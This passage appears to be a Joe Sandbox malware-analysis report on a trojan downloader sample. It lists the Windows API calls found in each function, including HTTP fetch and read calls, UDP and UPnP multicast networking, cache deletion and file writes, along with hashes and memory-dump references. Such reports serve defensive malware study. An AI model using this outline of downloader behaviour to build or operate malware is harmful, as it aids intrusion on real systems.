                                                                                • Instruction ID: f472e5e68ab63b0dd33345cd9092821366bebf82f5afbdb011aebb5a24a45ce9
                                                                                • Opcode Fuzzy Hash: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction Fuzzy Hash: 5D310A74A00208EFDB04DF98D889B9EBBB5FF49308F0085A9E905A7390D775EA95CF54
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction ID: 0b1db91c5ce03941f8675f6ecb7f2ec56fce17a7f2d6269111b0fb586e4650a4
                                                                                • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction Fuzzy Hash: 27111F326005186B8B10EF9EC48268ABBD6EF84361B15C136FC2CDF359D634E9414BD4
                                                                                APIs
                                                                                • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                • htons.WS2_32(?), ref: 00401281
                                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                • String ID: pdu
                                                                                • API String ID: 2164660128-2320407122
                                                                                • Opcode ID: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction ID: 1b6d4435c5f8e1f149c0fb86e6a0c1a3006a9f031597685944d6c13f048a50c8
                                                                                • Opcode Fuzzy Hash: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction Fuzzy Hash: E931B2362083009BC710DF69D884A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
                                                                                • SysAllocString.OLEAUT32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe), ref: 00406F83
                                                                                • CoUninitialize.OLE32 ref: 00406FA8
                                                                                  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                                                                Strings
                                                                                • C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, xrefs: 00406F7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$AllocInitializeUninitialize
                                                                                • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                                • API String ID: 459949847-3893178018
                                                                                • Opcode ID: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction ID: c509d36c12d7ba2a5f650eb278e956dc9bc0801d495f3ab7a1e1adcf34b7a620
                                                                                • Opcode Fuzzy Hash: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction Fuzzy Hash: 57E0DFB4941308FBCB00EBE0EE0EB8D7738EB04315F004078F90267291DABA9E90CB19
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3966618661-0
                                                                                • Opcode ID: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
                                                                                • Instruction ID: 9f2c4cc69d55b471d510ac50d158e14e0eacb849a4393371b11790265c13a883
                                                                                • Opcode Fuzzy Hash: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
                                                                                • Instruction Fuzzy Hash: 5841D175604B02ABC714DB38D848797F3A4BF84310F18823EE86D933D1E739A855CB99
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(0041AC50,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
                                                                                • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B0E9
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
                                                                                • InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                • String ID:
                                                                                • API String ID: 442028454-0
                                                                                • Opcode ID: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction ID: 65abf3b26d1f33ce57344cf3d4c90c2ddc2d392c326f45743aae56010b0155a0
                                                                                • Opcode Fuzzy Hash: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction Fuzzy Hash: D33149B8A40208EBCB14DF94EC45FAEB7B1FB48300F208569E511A7391D775AA51CB9A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl
                                                                                • String ID:
                                                                                • API String ID: 435966717-0
                                                                                • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction ID: b0d0b2528f3aca05c18ea064ccca22ed782aa92eb9f3aacb3aeadda2a23aac7b
                                                                                • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction Fuzzy Hash: 92F01272A01414979B14EEFE84424CAF7E59F88374B218176FD1CE3260E570B90546F1
                                                                                APIs
                                                                                • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                  • Part of subcall function 0040A660: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                • String ID: pdu
                                                                                • API String ID: 309973729-2320407122
                                                                                • Opcode ID: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction ID: 49315f9b5d193dc364c5f28f0bcb7aa8bb44b0403a6660fc991bd28791f727bd
                                                                                • Opcode Fuzzy Hash: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction Fuzzy Hash: A901D6B65003009BCB209F61ECC4D9B7778AF48310708467AFC05AB396CA39E8508775
                                                                                APIs
                                                                                • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                                                                • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                                • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeviceDriveQueryType
                                                                                • String ID: \??\
                                                                                • API String ID: 1681518211-3047946824
                                                                                • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                                • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                                APIs
                                                                                • ioctlsocket.WS2_32 ref: 0040112B
                                                                                • recvfrom.WS2_32 ref: 0040119C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                • String ID:
                                                                                • API String ID: 3980219359-0
                                                                                • Opcode ID: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction ID: dd229b18b8e608a96638b9a50d19e2d27eaf393d2ffc9a5ffa46aac6cea4a516
                                                                                • Opcode Fuzzy Hash: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction Fuzzy Hash: 7C21C3B1504301AFD304DF65DC84A6BB7E9EF88318F004A3EF555A6290E774D9588BEA
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 2074799992-0
                                                                                • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                                • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                • API String ID: 672405725-0
                                                                                • Opcode ID: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction ID: e789c4acaeed7b47b7c3c4d69342d3bd95a049e3571e2ded942ca122a7fff21c
                                                                                • Opcode Fuzzy Hash: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction Fuzzy Hash: A5218175E04208FBDB04DFA4D885B9E7B74AF44309F10C4A9ED416B391D679AB80DB49
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 2121970615-0
                                                                                • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                                • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D8D9
                                                                                • CloseHandle.KERNEL32(?), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0040D924
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                • API String ID: 3102160386-0
                                                                                • Opcode ID: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction ID: 6abb592c5b2ce8a5c046663d5def4690e4bb0a573cdaefcdc4ae98697e0ceaa0
                                                                                • Opcode Fuzzy Hash: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction Fuzzy Hash: 4E1161B4D00208EBDB08DF94D984A9DB775FF44309F1485A9E806A7341C739EF94DB85
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                • Opcode ID: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction ID: 487697b266744d2b5c3d358b1528705abebcded3db4b06867e0c0ac6ea0c4339
                                                                                • Opcode Fuzzy Hash: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction Fuzzy Hash: 4A01F7792423049FC3209F26ED84A9B73F8AF45711F04443EE44693650DB39E401CB28
                                                                                APIs
                                                                                  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFreeInstanceString
                                                                                • String ID: Microsoft Corporation
                                                                                • API String ID: 586785272-3838278685
                                                                                • Opcode ID: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction ID: 3bd6e37ccb81fb26e20ba6f4aecac2bab56e95e75b440682a2c5ba52433a4c42
                                                                                • Opcode Fuzzy Hash: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction Fuzzy Hash: 2D91EC75A0410ADFCB04DF94C894AAFB7B5BF49304F208169E515BB3E0D734AD41CBA6
                                                                                APIs
                                                                                  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
                                                                                  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
                                                                                  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
                                                                                  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                • String ID: %S%S
                                                                                • API String ID: 1017111014-3267608656
                                                                                • Opcode ID: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction ID: c1d615742e0f1fe272601d31d467041fc69409a08f8fe5a36c80dfd154d40f90
                                                                                • Opcode Fuzzy Hash: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction Fuzzy Hash: 5F414BB5E0020A9FCB04DFE4C885AEFB7B9BF48304F148569E505B7390D738AA45CBA5
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
                                                                                  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
                                                                                  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
